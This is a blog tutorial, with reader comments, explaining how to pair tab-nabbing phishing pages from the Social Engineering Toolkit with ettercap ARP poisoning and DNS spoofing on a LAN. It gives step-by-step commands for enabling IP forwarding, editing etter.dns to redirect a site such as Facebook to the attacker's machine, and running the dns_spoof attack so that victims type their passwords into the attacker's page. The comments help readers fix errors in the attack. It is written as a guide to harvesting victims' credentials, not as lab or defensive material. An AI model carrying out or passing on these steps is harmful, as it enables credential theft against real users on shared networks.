Please visit my new blog to find new updates.: http://aakarperiwal.com
Hello Everyone I am going to tell you how to use tab-nabbing with DNS Spoofing to make it more effective.
Hello Everyone I am going to tell you how to use tab-nabbing with DNS Spoofing to make it more effective.
First let me tell you what is Tab-nabbing?
Tab-nabbing is the Advance form of Phishing attack. The Tab-nabbing attack method is used when a victim has multiple tabs open. When the user click on the link he/she will get page presenting " please wait while the page loads" (depends upon your coding, but if you are using SET then you don’t have to do coding). When the victim switch tab then the website detects that a different tab is open and rewrites itself with the page you specify. When the victim clicks back on the link he/she will see a login page thinking that they may be logged. When the credentials are inserted attacker get the credential and victim get forwarded on the real website.
When you are using it on the WAN you have to send a link of your website to victim, but if you are using it on LAN then it is necessary that victim hit your web server to do so we use DNS spoofing so that victim click on our web server and our Tab-nabbing page open.
give the following commands
# cd /pentest/exploits/set/
# ./set
hit 1 (Social Engineering Attack)
Give your IP address and then give url of the website
Step 1:) Install ettercap (as root )
# apt-get -y install ettercap
Step 2:) Then enable IP forwarding
# echo 1 > /proc/sys/net/ipv4/ip_forward
Step 3:) Then locate etter.dns file
# locate etter.dns
Step 4:) Open the file and add entry at the end of the file
# nano /usr/local/share/ettercap/etter.dns
now add the entry at the end of the file
www.url-of-websitet-to-hack.com A your ip address
Step 5:) Now start the spoofing
# ettercap -T -q -M arp:remote -P dns_spoof //
Now whenever victim will type the url (facebook.com in this case ) then he/she will get redirected to attacker machine and Attacker will get all the credential
I have also uploaded a video tutorial of this attack...... Check it out
I have also uploaded a video tutorial of this attack...... Check it out
3 comments:
FATAL: ARP poisoning needs a non empty hosts list.
this shows while i start listening through ettercap
well I suggest you to check your IP address and mask you have, the demo I have shown is done in LAN with 24 bit mask(i.e 255.255.255.0) if you are getting 32 bit mask (i.e 255.255.255.255) then you have to manually add hosts in ettercap..
you can use command
ettercap -G
to use ettercap in GUI mode
or may be you are using different interface on ettercap that may cause you that error. If this is the case then add
-i interface_name
in the command e.g
ettercap -i eth0 ......
... means rest of the command
to get name of the interface use ifconfig
I have similar problem, and this post help me, thanks) i need just replace eth0 to wlan0 and ol fine;)
Post a Comment